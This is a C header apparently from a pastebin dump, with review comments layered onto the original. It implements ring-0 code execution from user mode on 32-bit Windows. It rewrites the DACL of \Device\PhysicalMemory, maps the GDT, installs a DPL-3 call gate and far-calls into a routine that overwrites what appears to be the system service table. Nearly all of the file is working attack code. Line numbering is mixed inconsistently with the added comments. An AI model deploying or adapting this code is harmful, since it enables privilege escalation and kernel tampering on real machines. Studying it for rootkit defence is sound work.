src/r0.h

May 17th, 2024
  1. // (c) Cr4sh
  2.  
/* MASM-style hex literal (0FFh). It is not valid in a C expression and can
 * only be used inside an __asm block; nothing in this file uses it. */
#define INTNUMBER               0FFh
/* Numeric value of the SE_OBJECT_TYPE enumerator SE_KERNEL_OBJECT, kept as a
 * plain macro so the aclapi.h enum need not be in scope; SetAccess casts it
 * back to SE_OBJECT_TYPE when calling Get/SetSecurityInfo. */
#define SE_KERNEL_OBJECT        6
/* OBJECT_ATTRIBUTES flag (ntdef.h), presumably redefined because the
 * user-mode headers in use do not provide it.  NOTE(review): passed by CallR0
 * from user mode, where it is presumably ignored by the object manager —
 * confirm it is not relied upon. */
#define OBJ_KERNEL_HANDLE       0x00000200L
  6.  
/* Declare and statically initialise a UNICODE_STRING named `_var` from the
 * wide string literal `_buffer`.  Length is the byte count without the
 * terminating NUL (one WORD), MaximumLength the full size of the literal,
 * Buffer the literal itself.  `_buffer` must be an array expression (a
 * literal), not a pointer, or sizeof yields the pointer size. */
#define INIT_UNICODE(_var, _buffer)                                   \
        UNICODE_STRING _var = { (WORD)(sizeof(_buffer) - sizeof(WORD)), \
                                (WORD)(sizeof(_buffer)),               \
                                (_buffer) }
  12.  
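/* Combine two 16-bit halves into a DWORD: `_l` becomes bits 0..15, `_h`
 * bits 16..31 (CallR0 uses it to rebuild the GDT base from BaseLow/BaseHigh).
 * Both operands are widened to DWORD before the shift: the original shifted
 * the int-promoted `_h`, which is signed overflow (undefined behaviour)
 * whenever bit 15 of `_h` is set — typically the case for a kernel-space
 * base address (0x8xxxxxxx).  Operands are parenthesised so compound
 * arguments expand safely. */
#define MAKE_DWORD(_l, _h) ((DWORD)(((DWORD)(_l)) | (((DWORD)(_h)) << 16)))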
  14.  
/* User-mode stand-in for the kernel PHYSICAL_ADDRESS type: a 64-bit
 * LARGE_INTEGER whose QuadPart is handed to NtMapViewOfSection as the section
 * offset into \Device\PhysicalMemory.  NOTE(review): clashes with the WDK
 * typedef if ntddk/wdm headers are ever included alongside this file. */
typedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;
  16.  
/* Despite the name this is not a GDT entry: it is the 6-byte image that
 * `sgdt` stores (CallR0 does `sgdt gGdt`).  LimitLow is the 16-bit table
 * limit (inclusive, in bytes) and BaseLow/BaseHigh together are the 32-bit
 * linear base, recombined with MAKE_DWORD(BaseLow, BaseHigh). */
typedef struct _KGDTENTRY
{
   WORD LimitLow;   /* GDTR limit: offset of the last byte of the table */
   WORD BaseLow;    /* GDTR base, bits 0..15 */
   WORD BaseHigh;   /* GDTR base, bits 16..31 */
} KGDTENTRY,
*PKGDTENTRY;
  24.  
/* 8-byte x86 call-gate descriptor as laid out in the GDT.  CallR0 fills one
 * of these in place: offset halves = target EIP, selector = 8, type = 12
 * (0xC, 32-bit call gate), app_system = 0 (system descriptor), dpl = 3 so a
 * ring-3 far call may use it, present = 1.
 *
 * NOTE(review): the bitfield layout relies on the compiler packing bitfields
 * low-to-high within each UCHAR (MSVC does).  The SDM defines a 5-bit
 * parameter count plus 3 reserved bits in byte 4; the 4/4 split here is
 * harmless only because CallR0 writes 0 to both fields. */
typedef struct _CALLGATE_DESCRIPTOR
{
   USHORT offset_0_15;     /* target EIP bits 0..15 */
   USHORT selector;        /* target code segment selector */
   UCHAR  param_count :4;  /* stack words copied on the call (always 0 here) */
   UCHAR  some_bits   :4;  /* remainder of byte 4, written 0 */
   UCHAR  type        :4;  /* descriptor type; 12 = 32-bit call gate */
   UCHAR  app_system  :1;  /* S flag; 0 = system descriptor (gates are) */
   UCHAR  dpl         :2;  /* lowest privilege allowed to call through it */
   UCHAR  present     :1;  /* CallR0 looks for a slot with this clear */
   USHORT offset_16_31;    /* target EIP bits 16..31 */
} CALLGATE_DESCRIPTOR,
*PCALLGATE_DESCRIPTOR;
  38.  
  39.  
  40.  
/* Address of the variable holding the service table base; R0Func derefs it
 * once more to reach the table itself (presumably the SSDT — verify against
 * the defining translation unit). */
extern DWORD sstaddr;
/* Number of entries R0Func copies from sst[] into the table. */
extern DWORD dwServices;
/* Saved table entries that R0Func writes back at ring 0.
 * NOTE(review): this is a definition, not a declaration, in a header —
 * including r0.h from more than one translation unit duplicates the symbol.
 * Nothing here ties dwServices to the 400-entry capacity. */
DWORD sst[400];
  44. //--------------------------------------------------------------------------------------
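/*
 * Ring-0 payload reached through the call gate CallR0 installs.  Copies the
 * first dwServices entries of sst[] over the table that *sstaddr points to,
 * then returns to the ring-3 caller with a far return (the gate is entered
 * by a far CALL, so a plain `ret` would not match).
 *
 * Naked: the compiler emits no prolog/epilog, so registers and flags are
 * saved by hand.  Interrupts are disabled for the whole copy; `pushf` runs
 * after `cli`, so the saved IF is 0 and `popf` keeps them off until the
 * explicit `sti`.
 *
 * NOTE(review): `i` is a C local in a naked function with no hand-built
 * frame — check the generated code for the target compiler/optimisation
 * level.  The FS selectors 0x30 / 0x3B presumably match NT's ring-0 PCR and
 * ring-3 TEB selectors; confirm for the target build.
 */
void __declspec(naked) R0Func(void)
{
    UINT i;
    __asm
    {
        cli                     ; no interrupts while the table is rewritten
        pushad
        pushf                   ; saved with IF already clear
        mov     di,0x30         ; ring-0 FS (PCR)
        mov     fs,di
    }

    /* Clamp to the capacity of sst[]: an over-long dwServices would read past
     * the array while running at ring 0 with interrupts off. */
    for (i = 0; i < dwServices && i < sizeof(sst) / sizeof(sst[0]); i++)
        ((DWORD*)(*(DWORD*)(sstaddr)))[i] = sst[i];

    __asm
    {
        mov     di,0x3B         ; ring-3 FS (TEB, RPL 3)
        mov     fs,di
        popf                    ; restores IF = 0 as saved above
        popad
        sti
        retf                    ; back through the gate to the far caller
    }
}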
  70. //--------------------------------------------------------------------------------------
  71. /*
  72. DWORD FindFunc(char *name)
  73. {
  74.     HMODULE hKrnl = LoadLibraryEx("ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES);
  75.     if (hKrnl == NULL)
  76.         return 0;
  77.  
  78.     DWORD dwAddr = (DWORD)GetProcAddress(hKrnl, name);
  79.     if (dwAddr == 0)
  80.         return 0;
  81.  
  82.     return dwAddr - (DWORD)hKrnl + dwKernelBase;
  83. }
  84. */
  85. //--------------------------------------------------------------------------------------
/*
 * Guess the physical address of the page containing the virtual address
 * `vAddress`.  Inside [0x80000000, 0xA0000000) the low 29 bits are kept
 * (mask 0x1FFFF000); everywhere else the low 28 bits (mask 0xFFFF000).  In
 * both cases the page-offset bits are dropped, so the result is the start of
 * the containing page: callers must add back (vAddress & 0xFFF) themselves
 * if the object is not page-aligned.
 *
 * NOTE(review): this is the classic \Device\PhysicalMemory shortcut for a
 * 32-bit kernel whose low kernel range is direct-mapped, not a page-table
 * walk; it is presumably only valid for that configuration — confirm on the
 * target before relying on it for anything but the GDT.
 */
PHYSICAL_ADDRESS GetPhysicalAddress(ULONG vAddress)
{
    PHYSICAL_ADDRESS physical;
    ULONG mask;

    if (vAddress >= 0x80000000L && vAddress < 0xA0000000L)
        mask = 0x1FFFF000;   /* direct-mapped kernel range */
    else
        mask = 0xFFFF000;

    physical.QuadPart = (ULONGLONG) vAddress & mask;
    return physical;
}
  99. //--------------------------------------------------------------------------------------
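/*
 * Add an ACE granting the calling user SECTION_MAP_WRITE on the object named
 * by ObAttributes (CallR0 passes \Device\PhysicalMemory).  The ACE is
 * appended to the object's existing DACL and is never removed here, so the
 * widened access outlives this process for as long as the object exists.
 * Succeeding requires WRITE_DAC on the object already; on releases where an
 * unprivileged caller cannot obtain that, nothing is changed.
 *
 * Returns nothing: a failure at any step simply leaves the DACL untouched,
 * and CallR0 detects it when its own NtOpenSection for write access fails.
 *
 * Changes from the original: the open uses the named rights it needs
 * (READ_CONTROL | WRITE_DAC — numerically the same 0x60000 the original
 * spelled as MEM_MAPPED | MEM_PRIVATE); every result is checked so a failed
 * open no longer feeds an uninitialised handle to the next call; and the
 * security descriptor and ACL that GetSecurityInfo / SetEntriesInAcl
 * allocate are released.
 */
void SetAccess(POBJECT_ATTRIBUTES ObAttributes)
{
    EXPLICIT_ACCESS Access;
    HANDLE hObj = NULL;
    PACL OldDacl = NULL, NewDacl = NULL;
    PSECURITY_DESCRIPTOR SecDesc = NULL;
    NTSTATUS ns;
    DWORD err;

    /* "CURRENT_USER" is the special trustee name resolved by SetEntriesInAcl
     * to the caller's own account. */
    Access.grfAccessPermissions             = SECTION_MAP_WRITE;
    Access.grfAccessMode                    = GRANT_ACCESS;
    Access.grfInheritance                   = NO_INHERITANCE;
    Access.Trustee.MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
    Access.Trustee.pMultipleTrustee         = NULL;
    Access.Trustee.TrusteeForm              = TRUSTEE_IS_NAME;
    Access.Trustee.TrusteeType              = TRUSTEE_IS_USER;
    Access.Trustee.ptstrName                = "CURRENT_USER";

    /* Reading the DACL needs READ_CONTROL, rewriting it needs WRITE_DAC. */
    ns = NtOpenSection(&hObj, READ_CONTROL | WRITE_DAC, ObAttributes);
    if (!NT_SUCCESS(ns))
        return;

    /* SecDesc owns OldDacl; both come from one allocation freed below. */
    err = GetSecurityInfo(hObj, (SE_OBJECT_TYPE)SE_KERNEL_OBJECT,
        DACL_SECURITY_INFORMATION, NULL, NULL, &OldDacl, NULL, &SecDesc);
    if (err != ERROR_SUCCESS)
        goto cleanup;

    err = SetEntriesInAcl(1, &Access, OldDacl, &NewDacl);
    if (err != ERROR_SUCCESS)
        goto cleanup;

    err = SetSecurityInfo(hObj, (SE_OBJECT_TYPE)SE_KERNEL_OBJECT,
        DACL_SECURITY_INFORMATION, NULL, NULL, NewDacl, NULL);

cleanup:
    if (NewDacl != NULL)
        LocalFree(NewDacl);
    if (SecDesc != NULL)
        LocalFree(SecDesc);
    CloseHandle(hObj);
}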
  129. //--------------------------------------------------------------------------------------
/* GDTR image filled by `sgdt` inside CallR0 (limit + linear base).  Kept as
 * a file-scope global, presumably so the inline-asm operand has a fixed
 * address; it is shared state, so concurrent CallR0 calls race on it. */
KGDTENTRY gGdt;
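/*
 * Run Func at ring 0 by installing a temporary 32-bit call gate in the GDT.
 *
 * Sequence: widen the DACL of \Device\PhysicalMemory (SetAccess), open it
 * for read/write, read the GDTR with `sgdt`, map the physical page(s)
 * holding the GDT, overwrite the highest descriptor whose present bit is
 * clear with a DPL-3 call gate to selector 8 / Func, far-call through it,
 * then zero the gate again.
 *
 * Func is entered by a far CALL through the gate and must end with `retf`,
 * as R0Func does.
 *
 * Returns TRUE when a gate was installed and the far call came back without
 * a user-mode exception.  The __except only intercepts a fault raised at the
 * call site (e.g. a rejected gate); anything that goes wrong inside Func
 * happens at ring 0 and is not caught here.
 *
 * Security notes:
 *  - While the gate is present it is a ring-0 entry point usable by every
 *    process on the machine.  It is zeroed on the normal path, but if this
 *    process dies between installation and fZeroMemory it stays behind.
 *  - The free-slot search is not serialised against other callers.
 *  - Assumes a 32-bit kernel, the GetPhysicalAddress page guess, and a
 *    page-aligned GDT base (the in-page offset is not added back).
 *  - SetAccess leaves the widened DACL in place after this returns.
 *
 * Changes from the original: the view size is the inclusive GDTR limit + 1,
 * the far pointer's unused offset words are initialised, and the unmap is
 * skipped when the map never succeeded.
 */
BOOL CallR0(DWORD Func)
{
    BOOL bRes = FALSE;
    OBJECT_ATTRIBUTES ObAttributes;
    HANDLE hSection = NULL;
    NTSTATUS ns;
    PHYSICAL_ADDRESS pAddress;
    PVOID MappedAddress = NULL;
    DWORD dwSize;
    PCALLGATE_DESCRIPTOR CgDesc;
    WORD farcall[3] = { 0, 0, 0 };   /* [0..1] offset (ignored by a gate), [2] selector */
    INIT_UNICODE(ObString, L"\\Device\\PhysicalMemory");

    InitializeObjectAttributes(&ObAttributes, &ObString,
                               OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);

    /* Grant ourselves SECTION_MAP_WRITE; if that silently failed, the open
     * for write access below fails and reports it. */
    SetAccess(&ObAttributes);

    ns = NtOpenSection(&hSection, SECTION_MAP_READ | SECTION_MAP_WRITE, &ObAttributes);
    if (!NT_SUCCESS(ns))
        return FALSE;

    /* GDTR: 16-bit limit + 32-bit linear base (see KGDTENTRY). */
    __asm sgdt gGdt;

    /* Page-granular guess at the GDT's physical page; the base's in-page
     * offset is dropped, hence the page-aligned-GDT assumption. */
    pAddress = GetPhysicalAddress(MAKE_DWORD(gGdt.BaseLow, gGdt.BaseHigh));

    /* The GDTR limit is inclusive: limit 0x3FF means 0x400 bytes of table. */
    dwSize = (DWORD) gGdt.LimitLow + 1;
    ns = NtMapViewOfSection(hSection, (HANDLE)-1, &MappedAddress,
                            0L, dwSize, &pAddress, &dwSize, ViewShare,
                            0, PAGE_READWRITE);
    if (!NT_SUCCESS(ns) || !MappedAddress)
        goto end;

    /* Walk from the last descriptor down to, but not including, entry 0 and
     * take the first slot whose present bit is clear. */
    for (CgDesc = (PCALLGATE_DESCRIPTOR)((DWORD)MappedAddress + (gGdt.LimitLow & 0xFFF8));
         (DWORD)CgDesc > (DWORD)MappedAddress;
         CgDesc--)
    {
        if (CgDesc->present == 0)
        {
            /* 32-bit call gate (type 0xC, S = 0) into selector 8 with DPL 3,
             * so a ring-3 far call is permitted to enter it. */
            CgDesc->offset_0_15  = (WORD)(Func & 0xFFFF);
            CgDesc->selector     = 8;
            CgDesc->param_count  = 0;
            CgDesc->some_bits    = 0;
            CgDesc->type         = 12;
            CgDesc->app_system   = 0;
            CgDesc->dpl          = 3;
            CgDesc->present      = 1;
            CgDesc->offset_16_31 = (WORD)(Func >> 16);
            bRes = TRUE;
            break;
        }
    }

    if (bRes)
    {
        /* Gate selector = byte offset of the descriptor within the GDT
         * (TI = 0) with RPL = 3.  The offset half of the far pointer stays 0;
         * the CPU takes the target from the gate, not from the pointer. */
        farcall[2] = ((WORD)((DWORD)CgDesc - (DWORD)MappedAddress)) | 3;

        /* Presumably to shrink the window in which the thread is preempted
         * while the gate is live. */
        SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);
        Sleep(0);

        __try
        {
            __asm call fword ptr [farcall]
        }
        __except (EXCEPTION_EXECUTE_HANDLER)
        {
            /* Only a fault at the call site lands here (see header). */
            bRes = FALSE;
        }

        SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL);

        /* Remove the gate so it does not persist as a ring-0 entry point. */
        fZeroMemory(CgDesc, sizeof(CALLGATE_DESCRIPTOR));
    }

end:
    if (MappedAddress != NULL)
        NtUnmapViewOfSection((HANDLE)-1, MappedAddress);

    CloseHandle(hSection);

    return bRes;
}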
  224. //--------------------------------------------------------------------------------------
  225. //int _tmain(int argc, _TCHAR* argv[])
  226. //{
  227.     // printf("end\n");
  228. //}
  229.  